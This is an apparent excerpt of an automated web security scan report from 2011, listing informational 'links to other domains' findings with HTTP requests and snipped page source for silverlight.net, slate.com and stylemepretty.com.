X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>

<a href="http://msdn.microsoft.com/"><img class="logo_msdn" alt="MSDN" src="http://i1.silverlight.net/resources/images/content/misc/header_logo_msdn.png?cdn_id=12152010">
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere_top.png?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
<p><a class="common_button" href="http://go.microsoft.com/fwlink/?LinkID=185584">DOWNLOAD NOW</a>
...[SNIP]...
<strong><a href="http://developer.windowsphone.com/">Windows Phone Developer</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkID=185584">Windows Phone Developer Tools</a> (be sure to <a href="http://go.microsoft.com/fwlink/?LinkID=194469">read the release notes</a>
...[SNIP]...
<li><a href="http://silverlight.codeplex.com/">Download the Windows Phone 7 Toolkit</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/?linkid=9713251">Developer Reference Documentation</a>
...[SNIP]...
<li>Developer guides for <a href="http://go.microsoft.com/?linkid=9713249">platform overview</a> and <a href="http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx">UI guidelines</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/?linkid=9713254">Code samples</a>
...[SNIP]...
<li><a href="http://channel9.msdn.com/learn/courses/WP7TrainingKit/">Channel 9 for hands-on-labs and other tutorials</a>
...[SNIP]...
<li><a href="http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads">Dedicated developer support forum for Silverlight for Windows Phone</a>
...[SNIP]...
<p>What are you waiting for? Go <a href="http://go.microsoft.com/fwlink/?LinkID=185584">install the tools</a>
...[SNIP]...
</iframe>
<a class="link_advertise" href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise Here</a>
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere.jpg?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</a> &#124; <a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise with us</a>
...[SNIP]...
<div class="footer_img_links">
<a href="http://www.asp.net" title="ASP.net"><img src="http://i1.silverlight.net/resources/images/content/misc/aspnet.png?cdn_id=12152010" alt="ASP.net" />
...[SNIP]...
</a>
<a href="http://channel9.msdn.com" title="Channel 9"> <img src="http://i1.silverlight.net/resources/images/content/misc/channel9.png?cdn_id=12152010" alt="Channel 9" /></a>
<a href="http://edge.technet.com/" title="Edge Technet"> <img src="http://i1.silverlight.net/resources/images/content/misc/technet.png?cdn_id=12152010" alt="Edge Technet" /></a>
<a href="http://www.iis.net" title="IIS"><img src="http://i1.silverlight.net/resources/images/content/misc/iis.png?cdn_id=12152010" alt="IIS" /></a>
<a href="http://visitmix.com/" title="MIX"><img src="http://i2.silverlight.net/resources/images/content/misc/mix.png?cdn_id=12152010" alt="MIX" /></a>
<a href="http://www.msdn.com" title="MSDN"><img src="http://i3.silverlight.net/resources/images/content/misc/msdn.png?cdn_id=12152010" alt="MSDN" /></a>
<a href="http://www.windowsclient.net" title="Windows Client"> <img src="http://i3.silverlight.net/resources/images/content/misc/windows_client.png?cdn_id=12152010" alt="WindowsClient" />
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://msstonojsslvnet.112.2O7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

22.484. http://www.slate.com/id/2282444/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slate.com
Path:   /id/2282444/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/2282444/?GT1=38001 HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:55:32 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en-US" lang="en-US" xmlns:lookup="XslLookup" xmlns="xhtml"><he
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><link rel="stylesheet" type="text/css" href="http://media.washingtonpost.com/wp-srv/ad/textlinks/style/textlinks.css" xmlns="" xmlns:tools="XslTools"><link rel="stylesheet" type="text/css" href="http://img.slate.com/css/echo.css" xmlns="" xmlns:tools="XslTools">
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&amp;v=1" xmlns=""></script>
...[SNIP]...
<em><a href="http://www.amazon.com/gp/product/0061711527?ie=UTF8&amp;tag=slatmaga-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=0061711527" target="_blank" xmlns:tools="XslTools"><span style="color:#0000ff;">
...[SNIP]...
<div style="padding:3px"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
</a><a class="tools tools-reprint" title="Reprints" href="http://www.magreprints.com/quickquote.aspx" target="_blank" rel="nofollow">REPRINTS</a>
...[SNIP]...
<div id="recommend_tab"><a target="_blank" class="recommend recommend-facebook" rel="nofollow" title="Share on Facebook" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&amp;t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book.">Facebook</a><a target="_blank" class="recommend recommend-digg" rel="nofollow" title="Digg This" href="http://digg.com/submit?phase=2&amp;url=http://www.slate.com/id/2282444/&amp;title=Slate+Magazine+-+Barbies+Gone+Wild">Digg</a><a target="_blank" class="recommend recommend-reddit" rel="nofollow" title="Share with Reddit" href="http://reddit.com/submit?url=http://www.slate.com/id/2282444/&amp;title=Slate+Magazine+-+Barbies+Gone+Wild">Reddit</a><a target="_blank" class="recommend recommend-stumbleupon" rel="nofollow" title="Share with Stumble Upon" href="http://www.stumbleupon.com/submit?url=http://www.slate.com/id/2282444/&amp;title=Slate+Magazine+-+Barbies+Gone+Wild">StumbleUpon</a>
...[SNIP]...
about their looks and weight, and displayed higher stress levels and rates of suicide and depression. Your average progressive parent probably already sensed the corrosive effect of sexualized dolls (<a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;location=http%3A%2F%2Fwww.amazon.com%2Fs%3Fie%3DUTF8%26x%3D0%26ref_%3Dnb_sb_noss%26y%3D0%26field-keywords%3Dbratz%26url%3Dsearch-alias%253Daps&amp;tag=slatmaga-20&amp;linkCode=ur2&amp;camp=1789&amp;creative=390957" target="_blank" xmlns:tools="XslTools">Bratz</a>
...[SNIP]...
</em><a href="http://www.facebook.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.twitter.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
<div style="float:left"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&amp;layout=standard&amp;show_faces=false&amp;width=400&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:400px; height:40px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
<div id="twitter_tool" class="DigBuzz"><a id="twittertoolanc" href="http://twitter.com/home?status=Slate+Magazine+-+Barbies+Gone+Wild%20-%200" target="_blank" style="margin:0"><img src="http://img.slate.com/images/tool_buttons/tweet.gif">
...[SNIP]...
<div id="facebook_tool" class="DigBuzz"><a id="fbtoolanc" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&amp;t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book." style="margin:0" target="_blank"><img src="http://img.slate.com/images/tool_buttons/facebook.gif">
...[SNIP]...
<div id="author_bio"><a href="http://www.mylagoldberg.com/" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;location=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fentity%2FMyla-Goldberg%2FB001IOBQYG%3Fie%3DUTF8%26ref_%3Dsr_ntt_srch_lnk_1%26qid%3D1296150636%26sr%3D8-1&amp;tag=slatmaga-20&amp;linkCode=ur2&amp;camp=1789&amp;creative=390957" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
<div style="width:308px;border-bottom:solid 1px #ccc;margin-left:6px"><iframe src="http://www.facebook.com/plugins/likebox.php?id=21516776437&amp;width=220&amp;connections=0&amp;stream=false&amp;header=false&amp;height=60" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:220px; height:60px; margin-left:52px" allowTransparency="true"></iframe></div><div style="width:334px;height:183px;overflow:hidden;overflow-y:scroll;"><iframe src="http://www.facebook.com/plugins/activity.php?site=www.slate.com&amp;width=306&amp;height=600&amp;header=false&amp;border_color=white&amp;font=arial&amp;colorscheme=light&amp;recommendations=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:306px; height:600px;margin-left:14px;" allowTransparency="true"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js"></script>
...[SNIP]...
<div id="toc_media_item_3" style="z-index:3">Wingman.<a href="http://www.doonesbury.com/"><img style="margin-left:6px;" width="306" height="202" src="http://img.slate.com/media/298/td.jpg" alt="298/td.jpg">
...[SNIP]...
</script><object id="homepagePlayer" width="320" height="235" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="flashVars" value="playlistId=64696393001&amp;adNode=slate.v.video/slatev&amp;hideCompanion=false">
...[SNIP]...
<div class="header_content"><a class="links" href="http://twitter.com/Slate"></a>
...[SNIP]...
<p class="hed">Guys jumps off trampoline, dunks himself through basketball hoop. <a href="http://deadsp.in/gXIoPd">http://deadsp.in/gXIoPd</a>
...[SNIP]...
<p class="hed">Obama administration is backing off and waiting, as everyone is waiting, for collapse of Mubarak government. <a href="http://search.twitter.com/search?q=%23Egypt" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#Egypt');">#Egypt</a> <a href="http://slate.me/gnohLd">http://slate.me/gnohLd</a>
...[SNIP]...
<p class="hed">BREAKING: Dennis Kucinich settled his lawsuit against the House cafeteria over the olive he bit into... <a href="http://slate.me/iaYMxt">http://slate.me/iaYMxt</a>
...[SNIP]...
<div class="partner_feed_cntr" id="root_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="root_logo" style="display:block;background-color:#676735;" target="_blank" href="http://www.theroot.com/?from=rss"><img src="http://img.slate.com/Images/redesign2008/feeds/theroot.gif" alt="The Root">
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/tichina-arnold-return-television" style="color:#676735">Tichina Arnold To Return to Television</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/egypt-crisis-intensifies" style="color:#676735">Egypt Crisis Intensifies</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/views/root-interview-corinne-bailey-rae-getting-happy" style="color:#676735">The Root Interview: Corinne Bailey Rae on Getting to Happy</a>
...[SNIP]...
<div class="partner_feed_cntr" id="foreignpolicy_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="foreignpolicy_logo" style="display:block;background-color:#000;" target="_blank" href="http://www.foreignpolicy.com"><img src="http://img.slate.com/Images/redesign2008/feeds/foreignpolicy.gif" alt="Foreign Policy">
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/25/day_of_rage" style="color:#000">Egypt Burning: The Latest Street Scenes</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/27/egypt_s_struggle_for_freedom" style="color:#000">Egypt's Struggle for Freedom</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/20/close_encounters_of_the_buddhist_kind" style="color:#000">Close Encounters of the Buddhist Kind</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js">

</script>
...[SNIP]...
</a> |
<a href="http://www.facebook.com/pages/Slatecom/21516776437"><em>
...[SNIP]...
<div id="wapo_338542" xmlns=""><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js" xmlns="" xmlns:tools="XslTools"></script><noscript xmlns="" xmlns:tools="XslTools"><img src="http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"></noscript>
...[SNIP]...
</script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J05531" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/audsci.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...

22.485. http://www.slate.com/id/2282444/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slate.com
Path:   /id/2282444/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/2282444/?GT1=38001 HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:11:45 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en-US" lang="en-US" xmlns:lookup="XslLookup" xmlns="xhtml"><he
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><link rel="stylesheet" type="text/css" href="http://media.washingtonpost.com/wp-srv/ad/textlinks/style/textlinks.css" xmlns="" xmlns:tools="XslTools"><link rel="stylesheet" type="text/css" href="http://img.slate.com/css/echo.css" xmlns="" xmlns:tools="XslTools">
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&amp;v=1" xmlns=""></script>
...[SNIP]...
<em><a href="http://www.amazon.com/gp/product/0061711527?ie=UTF8&amp;tag=slatmaga-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=0061711527" target="_blank" xmlns:tools="XslTools"><span style="color:#0000ff;">
...[SNIP]...
<div style="padding:3px"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
</a><a class="tools tools-reprint" title="Reprints" href="http://www.magreprints.com/quickquote.aspx" target="_blank" rel="nofollow">REPRINTS</a>
...[SNIP]...
<div id="recommend_tab"><a target="_blank" class="recommend recommend-facebook" rel="nofollow" title="Share on Facebook" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&amp;t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book.">Facebook</a><a target="_blank" class="recommend recommend-digg" rel="nofollow" title="Digg This" href="http://digg.com/submit?phase=2&amp;url=http://www.slate.com/id/2282444/&amp;title=Slate+Magazine+-+Barbies+Gone+Wild">Digg</a><a target="_blank" class="recommend recommend-reddit" rel="nofollow" title="Share with Reddit" href="http://reddit.com/submit?url=http://www.slate.com/id/2282444/&amp;title=Slate+Magazine+-+Barbies+Gone+Wild">Reddit</a><a target="_blank" class="recommend recommend-stumbleupon" rel="nofollow" title="Share with Stumble Upon" href="http://www.stumbleupon.com/submit?url=http://www.slate.com/id/2282444/&amp;title=Slate+Magazine+-+Barbies+Gone+Wild">StumbleUpon</a>
...[SNIP]...
about their looks and weight, and displayed higher stress levels and rates of suicide and depression. Your average progressive parent probably already sensed the corrosive effect of sexualized dolls (<a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;location=http%3A%2F%2Fwww.amazon.com%2Fs%3Fie%3DUTF8%26x%3D0%26ref_%3Dnb_sb_noss%26y%3D0%26field-keywords%3Dbratz%26url%3Dsearch-alias%253Daps&amp;tag=slatmaga-20&amp;linkCode=ur2&amp;camp=1789&amp;creative=390957" target="_blank" xmlns:tools="XslTools">Bratz</a>
...[SNIP]...
</em><a href="http://www.facebook.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.twitter.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
<div style="float:left"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&amp;layout=standard&amp;show_faces=false&amp;width=400&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:400px; height:40px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
<div id="twitter_tool" class="DigBuzz"><a id="twittertoolanc" href="http://twitter.com/home?status=Slate+Magazine+-+Barbies+Gone+Wild%20-%200" target="_blank" style="margin:0"><img src="http://img.slate.com/images/tool_buttons/tweet.gif">
...[SNIP]...
<div id="facebook_tool" class="DigBuzz"><a id="fbtoolanc" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&amp;t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book." style="margin:0" target="_blank"><img src="http://img.slate.com/images/tool_buttons/facebook.gif">
...[SNIP]...
<div id="author_bio"><a href="http://www.mylagoldberg.com/" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;location=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fentity%2FMyla-Goldberg%2FB001IOBQYG%3Fie%3DUTF8%26ref_%3Dsr_ntt_srch_lnk_1%26qid%3D1296150636%26sr%3D8-1&amp;tag=slatmaga-20&amp;linkCode=ur2&amp;camp=1789&amp;creative=390957" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
<div style="width:308px;border-bottom:solid 1px #ccc;margin-left:6px"><iframe src="http://www.facebook.com/plugins/likebox.php?id=21516776437&amp;width=220&amp;connections=0&amp;stream=false&amp;header=false&amp;height=60" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:220px; height:60px; margin-left:52px" allowTransparency="true"></iframe></div><div style="width:334px;height:183px;overflow:hidden;overflow-y:scroll;"><iframe src="http://www.facebook.com/plugins/activity.php?site=www.slate.com&amp;width=306&amp;height=600&amp;header=false&amp;border_color=white&amp;font=arial&amp;colorscheme=light&amp;recommendations=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:306px; height:600px;margin-left:14px;" allowTransparency="true"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js"></script>
...[SNIP]...
<div id="toc_media_item_3" style="z-index:3">Ya gotta believe.<a href="http://www.doonesbury.com/"><img style="margin-left:6px;" width="306" height="202" src="http://img.slate.com/media/298/td.jpg" alt="298/td.jpg">
...[SNIP]...
</script><object id="homepagePlayer" width="320" height="235" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="flashVars" value="playlistId=64696393001&amp;adNode=slate.v.video/slatev&amp;hideCompanion=false">
...[SNIP]...
<div class="header_content"><a class="links" href="http://twitter.com/Slate"></a>
...[SNIP]...
<p class="hed">Guys jumps off trampoline, dunks himself through basketball hoop. <a href="http://deadsp.in/gXIoPd">http://deadsp.in/gXIoPd</a>
...[SNIP]...
<p class="hed">Obama administration is backing off and waiting, as everyone is waiting, for collapse of Mubarak government. <a href="http://search.twitter.com/search?q=%23Egypt" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#Egypt');">#Egypt</a> <a href="http://slate.me/gnohLd">http://slate.me/gnohLd</a>
...[SNIP]...
<p class="hed">BREAKING: Dennis Kucinich settled his lawsuit against the House cafeteria over the olive he bit into... <a href="http://slate.me/iaYMxt">http://slate.me/iaYMxt</a>
...[SNIP]...
<div class="partner_feed_cntr" id="root_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="root_logo" style="display:block;background-color:#676735;" target="_blank" href="http://www.theroot.com/?from=rss"><img src="http://img.slate.com/Images/redesign2008/feeds/theroot.gif" alt="The Root">
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/will-tea-party-favorite-become-next-black-us-senator" style="color:#676735">Will a Tea Party Favorite Become the Next Black U.S. Senator?</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/views/brick-city-documentary-season-2-real-time-cory-booker" style="color:#676735">'Brick City' Documentary Season 2: Real Time With Cory Booker</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/old-spice-guy-returns" style="color:#676735">The Old Spice Guy Returns</a>
...[SNIP]...
<div class="partner_feed_cntr" id="foreignpolicy_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="foreignpolicy_logo" style="display:block;background-color:#000;" target="_blank" href="http://www.foreignpolicy.com"><img src="http://img.slate.com/Images/redesign2008/feeds/foreignpolicy.gif" alt="Foreign Policy">
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/25/day_of_rage" style="color:#000">Egypt Burning: The Latest Street Scenes</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/27/egypt_s_struggle_for_freedom" style="color:#000">Egypt's Struggle for Freedom</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/20/close_encounters_of_the_buddhist_kind" style="color:#000">Close Encounters of the Buddhist Kind</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js">

</script>
...[SNIP]...
</a> |
<a href="http://www.facebook.com/pages/Slatecom/21516776437"><em>
...[SNIP]...
<div id="wapo_338542" xmlns=""><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js" xmlns="" xmlns:tools="XslTools"></script><noscript xmlns="" xmlns:tools="XslTools"><img src="http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"></noscript>
...[SNIP]...
</script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J05531" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/audsci.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...

22.486. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:28 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
<td style="padding-bottom: 10px; padding-left:10px; vertical-align:middle;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.facebook.com/pages/Style-Me-Pretty/51850479973">Visit us on <b>
...[SNIP]...
